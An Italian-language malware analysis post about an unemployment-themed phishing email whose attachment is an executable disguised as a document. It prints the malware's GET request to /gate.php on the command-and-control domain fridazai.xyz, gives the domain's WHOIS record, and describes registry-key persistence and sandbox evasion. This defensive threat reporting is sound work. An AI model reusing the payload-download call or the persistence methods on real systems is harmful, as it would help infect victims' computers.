Malware “Disoccupazione” e C&C Godzilla Loader

email_disoccupazione

Nella giornata odierna ci è pervenuta la segnalazione di una nuova campagna di diffusione di Malware a mezzo eMail, come potete vedere dallo screenshot in apertura la comunicazione attrae particolarmente l’attenzione del destinatario perché tratta di argomenti molto sensibili ad un dipendente. Il licenziamento e la disoccupazione sono ad oggi due argomenti di forte interesse e preoccupazione pertanto un utente sbadato con il patema di ricevere la notifica di disoccupazione può cadere nel tranello ed aprire l’allegato denominato documenti n.1,2,3_doc.zip tale allegato contiene l’eseguibile documenti n.1,2,3_doc.DOCX.exe in grado di scaricare ed eseguire un malware.

La seguente breve analisi vuole riportare alcuni dettagli tecnici rilevati nell’analisi condotta nei nostri laboratori, per rendere noto il lavoro meticoloso svolto per diffondere virus a partire da una eMail scritta correttamente nel lessico e nei contenuti e anche una importante precisione tecnica per infettare il computer.

Il file allegato, come anticipato, eseguirà il download del malware via web eseguendo la seguente chiamata GET:

GET /gate.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*
Accept-Language: it
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: fridazai.xyz

Il dominio fridazai.xyz che subito colpisce l’occhio non si tratta di un sito internet compromesso, come recentemente accade per la diffusione di Cryptoware, ma è stato registrato ad-hoc il 25 Aprile 2016 sfruttando il WhoisGuard Protected per anonimizzare l’intestazione.

Domain Name: FRIDAZAI.XYZ
Domain ID: D19967705-CNIC
WHOIS Server: whois.namecheap.com
Updated Date: 2016-04-25T16:28:06.0Z
Creation Date: 2016-04-25T16:28:03.0Z
Registry Expiry Date: 2017-04-25T23:59:59.0Z
Sponsoring Registrar: Namecheap
Sponsoring Registrar IANA ID: 1068
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant ID: C47900863-CNIC
Registrant Name: WhoisGuard Protected
Registrant Organization: WhoisGuard, Inc.
>>> Last update of WHOIS database: 2016-05-12T12:01:37.0Z <<<

Fridazai è l’anello chiave di questa analisi essendo un server C&C (Command and Control) gestito dal Bootmaster, il panello di accesso riporta il nome Godzilla e indubbiamente guardando il logo il riferimento al film è decisamente lampante.

 

c&c_godzilla

 

Una volta avviato il malware eseguirà il download attraverso la chiamate GET precedentemente riportata e andrà a replicarsi all’interno della directory Programmi del proprio computer.

 

vlcsnap-2016-05-12-14h12m26s568

 

Successivamente, non avviandosi nell’immediatezza, andrà a memorizzare una nuova chiave nel registro di Windows per avviarsi al successivo avvio.

 

vlcsnap-2016-05-12-14h16m43s063

 

Il nome dell’eseguibile corrisponderà all’id sfruttato nel C&C per rappresentare i computer infetti e salvato anche in un dedicato file .ini

 

vlcsnap-2016-05-12-14h21m48s272

 

Allo stato attuale l’analisi sembrerebbe indicare che il malware riesca a riconoscere di essere in esecuzione su una sand box e adotta comportamenti atti ad evitare la completa analisi. Nell’attesa di ulteriori accertamenti vogliamo mostrarvi alcune schermate del C&C Godlizza Loader rilevate in un forum tematico, i cui particolari lascerebbero ipotizzare che la paternità di questa struttura C&C vada ricercata in Russia.